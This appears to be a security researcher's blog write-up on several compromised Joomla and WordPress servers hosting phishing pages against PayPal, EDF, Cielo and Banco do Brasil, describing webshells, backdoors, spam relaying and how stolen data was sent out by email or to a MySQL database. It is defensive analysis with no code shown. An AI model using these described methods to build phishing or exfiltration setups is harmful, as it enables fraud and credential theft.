The first site is gtmaustralia.com.au, phishing mirrors:
Targeting Paypal, the compromised server run Joomla 1.5.20 Stable Release [18-July-2010]
Hacker used a phishing redirector, on another compromised server running Wordpress:
VT 0/46 - VT 3/34
Severals backdoors was found:
And a WSO Shell with obfuscated code to avoid antivirus.
From server side, resend.php send phished datas to the hacker:
The server was aslo used to target EDF (Electricité de France)
Datas are still send via e-mail, sniper.php:
Cielo targeted, VT 5/46
And also Banco do Brasil, VT 0/46
It's alot of phishs for just one server and it's not finished, the server was also used for spam:
Now by viewing access logs i suspect 18.104.22.168:
Second case (and probably same guys behind)
Phishing targeting EDF: http://www.phishtank.com/phish_detail.php?phish_id=1693105
The server is running Joomla here again.
This time, log files was cleared.
I've posted previous infos including log files on kernelmode. (did they read me ?)
Datats are still send via mail, index3.php:
And used as spam relay here again:
Shell found this time was a edited version of Backdoor.PHP.WebShell.BD:
On a similar case i coded a tool to retrieve phishing urls from rotators:
Server was satured later:
They make different dirs with phishing pages to evade antivirus:
Last case was a Paypal phish page found by markusg targeting German people.
Server is running wordpress.
Not same guys, not same technic.
This time, datas are sent to a mySQL db on another compromised server:
'ccs' make me think 'Credit Card Sell'
On the server where datas are sent the hacker use a parser for credit cards.
Datas collected are probably used to supply carding shops.
You can find more research/dumped phishing pages/spam tools/additional files here including mail source, and here for dumped backdoors.
Also interesting: Unixfreakjp have do a post about the connection of backdoors and exploit kits here